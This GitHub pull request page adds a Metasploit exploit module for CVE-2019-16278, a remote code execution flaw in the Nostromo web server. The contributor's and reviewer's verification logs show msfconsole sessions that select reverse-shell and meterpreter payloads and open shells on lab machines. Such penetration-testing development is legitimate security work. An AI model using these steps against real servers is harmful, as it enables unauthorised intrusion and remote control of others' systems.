Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit for CVE-2019-16278 (Nostromo RCE) #12476

Merged
merged 12 commits into from
Oct 31, 2019
Merged

Exploit for CVE-2019-16278 (Nostromo RCE) #12476

merged 12 commits into from
Oct 31, 2019

Conversation

qkaiser
Copy link
Contributor

@qkaiser qkaiser commented Oct 21, 2019
edited
Loading

This is a port of sp0re's exploit for CVE-2019-16278, described in https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html

Verification

Nostromo 1.9.6 on Ubuntu Linux 18.04

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000
RPORT => 8000
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8000 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 192.168.1.9
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : nostromo.local
OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit

Nostromo 1.9.6 on OpenBSD 6.4

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001
RPORT => 8001
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8001 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100
id
uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uname -avr
OpenBSD nostromo.local 6.4 GENERIC#349 amd64
^C
Abort session 1? [y/N]  y
[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit

bcoles
bcoles reviewed Oct 27, 2019
View reviewed changes
modules/exploits/multi/http/nostromo_code_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/nostromo_code_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/nostromo_code_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/nostromo_code_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/nostromo_code_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/nostromo_code_exec.rb Outdated Show resolved Hide resolved
@space-r7 space-r7 self-assigned this Oct 30, 2019
@qkaiser @space-r7
Update documentation/modules/exploit/multi/http/nostromo_code_exec.md
a55c5c6 
s/Nostrom/Nostromo/

Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@space-r7
Copy link
Contributor

Tested on Nostromo v1.96 with Ubuntu 18.04:

msf5 > use exploit/multi/http/nostromo_code_exec 
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.37.231
rhosts => 192.168.37.231
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.37.231:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Sending stage (3021284 bytes) to 192.168.37.231
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.231:40700) at 2019-10-30 14:29:17 -0500
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: uid=1002, gid=1002, euid=1002, egid=1002
meterpreter > sysinfo
Computer     : 192.168.37.231
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

space-r7 added a commit that referenced this pull request Oct 31, 2019
@space-r7
Land #12476, add Nostromo dir traversal RCE
0b4a0b3
@space-r7 space-r7 merged commit 4a6c1d8 into rapid7:master Oct 31, 2019
msjenkins-r7 pushed a commit that referenced this pull request Oct 31, 2019
@space-r7 @msjenkins-r7
Land #12476, add Nostromo dir traversal RCE
7b57a6c
@space-r7
Copy link
Contributor

space-r7 commented Oct 31, 2019
edited by tperry-r7
Loading

Release Notes

This adds an exploit module for Nostromo web server versions 1.9.6 and below. Remote code execution can be achieved because of insufficient checks on attempted directory traversal in the http_verify() function, leading to malicious, user-controlled code being passed to execve() function.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

@space-r7 space-r7 space-r7 left review comments

Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@qkaiser @space-r7 @bcoles @bwatters-r7 @tperry-r7